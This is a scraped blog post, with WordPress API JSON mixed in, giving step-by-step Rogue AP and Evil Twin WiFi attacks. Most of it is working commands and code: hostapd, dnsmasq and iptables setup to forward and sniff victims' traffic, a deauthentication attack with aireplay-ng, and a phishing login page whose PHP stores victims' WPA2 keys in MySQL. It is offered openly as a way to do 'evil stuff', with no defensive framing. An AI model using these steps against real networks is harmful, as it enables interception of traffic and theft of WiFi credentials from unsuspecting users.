A created Fake AP can be used for many evil stuff like sniffing credentials (Rogue AP) or reqesting credentials (Evil Twin).<\/p>\n
1. Rogue AP<\/strong> 0. Find out all necessary data for setting up the AP (channel) and connecting to the internet (ssid).<\/p>\n 1. Get a second network interface with e.g. WiFi stick, ethernet, virtual WiFi (used here).<\/p>\n 2. Connect one network interface with the internet (ethernet or wireless)<\/p>\n 3. Creating an AP on the other network interface (wireless)<\/p>\n 4. Setting up DHCP for the network interface that works as AP<\/p>\n 5. Forward the network traffic (victim <--> internet)<\/p>\n 2. Evil Twin<\/strong> This time it’s not necessary to have an internet connection, cause you fake the backend with a local apache\/mysql service. The AP has to look like the AP you want to mirror, which means the same mac, ssid and channel. Let the traffic from the victim get routed to your created php website. After a deauthentification attack you have just to wait til a victim connects to you fake AP and inserts the from your website requested WLAN login. Now you can just query the mysql database for the saved wpa2 key. By the way if you are too lazy to do this by your own you can just use a tool like Fluxion.<\/p>\n 1. Setup website (\/var\/www\/html\/) and database<\/p>\n 2. Setup mirrored AP, DHCP and Routing 3. Add Routing to your local website<\/p>\n 4. Deauth clients from the victim AP<\/p>\n A created Fake AP can be used for many evil stuff like sniffing credentials (Rogue AP) or reqesting credentials (Evil<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false},"categories":[26],"tags":[],"_links":{"self":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1313"}],"collection":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1313"}],"version-history":[{"count":1,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1313\/revisions"}],"predecessor-version":[{"id":16957,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=\/wp\/v2\/posts\/1313\/revisions\/16957"}],"wp:attachment":[{"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1313"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1313"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.max-sperling.bplaced.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1313"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\nYou set up an open WiFi AP and have a parallel connection to the internet. When a victim connects to your AP you just forward and sniff its traffic.<\/p>\n\r\n$ iwlist wlan0 scanning\r\n<\/pre>\n
\r\n$ service network-manager stop\r\n$ ifconfig wlan0 down\r\n\r\n$ iw phy phy0 interface add new0 type station\r\n$ iw phy phy0 interface add new1 type __ap\r\n\r\n$ ifconfig new0 down\r\n$ ifconfig new1 down\r\n$ macchanger --mac 00:11:22:33:44:55 new0\r\n$ macchanger --mac 00:11:22:33:44:66 new1\r\n$ ifconfig new0 up\r\n$ ifconfig new1 up\r\n<\/pre>\n
\r\n$ wpa_passphrase <SSID> > wpa_sup.conf\r\n# Enter: WPA2-Key\r\n\r\n$ wpa_supplicant -B -D nl80211 -i new0 -c wpa_sup.conf\r\n$ dhclient new0\r\n<\/pre>\n
\r\n$ echo "interface=new1\r\ndriver=nl80211\r\nssid=Free-WiFi\r\nchannel=<CHANNEL>" > hostapd.conf\r\n\r\n$ ifconfig new1 10.0.0.1 up\r\n$ hostapd hostapd.conf\r\n<\/pre>\n
\r\n$ echo "interface=new1\r\ndhcp-range=10.0.0.10,10.0.0.250,infinite\r\ndhcp-option=3,10.0.0.1\r\ndhcp-option=6,10.0.0.1\r\nserver=8.8.8.8" > dnsmasq.conf\r\n\r\n$ route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1\r\n$ dnsmasq -C dnsmasq.conf -d\r\n<\/pre>\n
\r\n$ iptables --table nat --append POSTROUTING --out-interface new0 -j MASQUERADE\r\n$ iptables --append FORWARD --in-interface new1 -j ACCEPT\r\n$ echo 1 > \/proc\/sys\/net\/ipv4\/ip_forward\r\n<\/pre>\n
\n
\nYou set up an open WiFi AP with the same ssid as another and broadcast a deauth packet. When a victim connects to your AP you link it to your fake backend to request credentials.<\/p>\n\r\nCREATE USER 'user'@'localhost' IDENTIFIED BY 'pass';\r\nGRANT ALL PRIVILEGES ON *.* TO 'user'@'localhost';\r\nFLUSH PRIVILEGES;\r\n\r\nCREATE DATABASE WiFiKeysDB;\r\nUSE WiFiKeysDB;\r\nCREATE TABLE WiFiKeys (wifikey VARCHAR(128));\r\n<\/pre>\n
\r\n<html>\r\n<head><title>WiFi-Login<\/title><\/head>\r\n<body>\r\n <form action="writekey.php" method="post">\r\n WiFi-Key: <input type="text" name="wifikey">\r\n <input type="submit" value="Submit">\r\n <\/form>\r\n<\/body>\r\n<\/html>\r\n<\/pre>\n
\r\n<?php\r\n $wifikey = $_POST['wifikey'];\r\n try {\r\n $pdo = new PDO('mysql:host=localhost;dbname=WiFiKeysDB', 'user', 'pass');\r\n $stm = $pdo->prepare('INSERT INTO WiFiKeys (wifikey) VALUES (?)');\r\n $stm->execute(array($wifikey);\r\n echo "Success";\r\n } catch (PDOException $e) {\r\n echo "Failure: " . $e->getMessage();\r\n }\r\n?>\r\n<\/pre>\n\r\n$ service mysql start\r\n$ mysql -p < createdb.sql\r\n$ service apache2 start\r\n<\/pre>\n
\nSee above, but with mirrored data from the victim AP.<\/p>\n\r\n$ iptables -t nat -A PREROUTING -p tcp --dport 80 \\\r\n-j DNAT --to-destination <LOCAL_IP>:80\r\n<\/pre>\n
\r\n# all clients\r\n$ aireplay-ng -0 5 -a <MAC_Router> <INTERFACE_AP>\r\n\r\n# specific client\r\n$ aireplay-ng -0 5 -a <MAC_Router> -c <MAC_Client> <INTERFACE_AP>\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"